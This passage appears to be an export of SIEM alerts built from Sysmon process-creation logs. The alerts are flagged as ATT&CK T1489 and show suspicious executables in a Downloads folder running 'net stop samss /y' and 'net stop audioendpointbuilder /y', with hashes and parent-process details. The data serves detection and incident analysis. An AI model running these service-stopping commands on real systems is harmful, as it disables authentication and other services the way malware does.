MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:14.828"",""processGuid"":""{df9fc3d3-d1ca-5ec7-0000-0010f1683100}"",""processId"":""153288"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:39:23.415",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:14.837 +ProcessGuid: {df9fc3d3-d1ca-5ec7-0000-001078693100} +ProcessId: 153300 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: 
net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010ce5c3100} +ParentProcessId: 152704 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:14.848620000Z"",""eventRecordID"":""1146"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:14.837\r\nProcessGuid: {df9fc3d3-d1ca-5ec7-0000-001078693100}\r\nProcessId: 153300\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010ce5c3100}\r\nParentProcessId: 152704\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:14.837"",""processGuid"":""{df9fc3d3-d1ca-5ec7-0000-001078693100}"",""processId"":""153300"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1ca-5ec7-0000-0010ce5c3100}"",""parentProcessId"":""152704"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:39:23.380",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:14.581 +ProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010ce5c3100} +ProcessId: 152704 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:14.590578100Z"",""eventRecordID"":""1145"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:14.581\r\nProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010ce5c3100}\r\nProcessId: 152704\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:14.581"",""processGuid"":""{df9fc3d3-d1ca-5ec7-0000-0010ce5c3100}"",""processId"":""152704"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:39:18.934",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:08.639 +ProcessGuid: {df9fc3d3-d1c4-5ec7-0000-0010470d3000} +ProcessId: 146872 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00107bc12f00} +ParentProcessId: 146424 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:08.645573600Z"",""eventRecordID"":""1144"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:08.639\r\nProcessGuid: {df9fc3d3-d1c4-5ec7-0000-0010470d3000}\r\nProcessId: 146872\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00107bc12f00}\r\nParentProcessId: 146424\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:08.639"",""processGuid"":""{df9fc3d3-d1c4-5ec7-0000-0010470d3000}"",""processId"":""146872"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1c3-5ec7-0000-00107bc12f00}"",""parentProcessId"":""146424"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:39:16.313",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:08.096 +ProcessGuid: {df9fc3d3-d1c4-5ec7-0000-0010b9eb2f00} +ProcessId: 146476 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop 
""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00105eae2f00} +ParentProcessId: 146396 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:08.127730700Z"",""eventRecordID"":""1143"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:08.096\r\nProcessGuid: {df9fc3d3-d1c4-5ec7-0000-0010b9eb2f00}\r\nProcessId: 146476\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00105eae2f00}\r\nParentProcessId: 146396\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:08.096"",""processGuid"":""{df9fc3d3-d1c4-5ec7-0000-0010b9eb2f00}"",""processId"":""146476"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1c3-5ec7-0000-00105eae2f00}"",""parentProcessId"":""146396"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:39:16.294",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:07.627 +ProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00107bc12f00} +ProcessId: 146424 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:07.817795500Z"",""eventRecordID"":""1142"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:07.627\r\nProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00107bc12f00}\r\nProcessId: 146424\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:07.627"",""processGuid"":""{df9fc3d3-d1c3-5ec7-0000-00107bc12f00}"",""processId"":""146424"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:39:16.216",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:07.328 +ProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00105eae2f00} +ProcessId: 146396 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:07.341346100Z"",""eventRecordID"":""1141"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:07.328\r\nProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00105eae2f00}\r\nProcessId: 146396\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:07.328"",""processGuid"":""{df9fc3d3-d1c3-5ec7-0000-00105eae2f00}"",""processId"":""146396"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:39:00.138",9,"Windows Application error event","""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x15c0 +Faulting application start time: 0x01d6303b54371e58 +Faulting application 
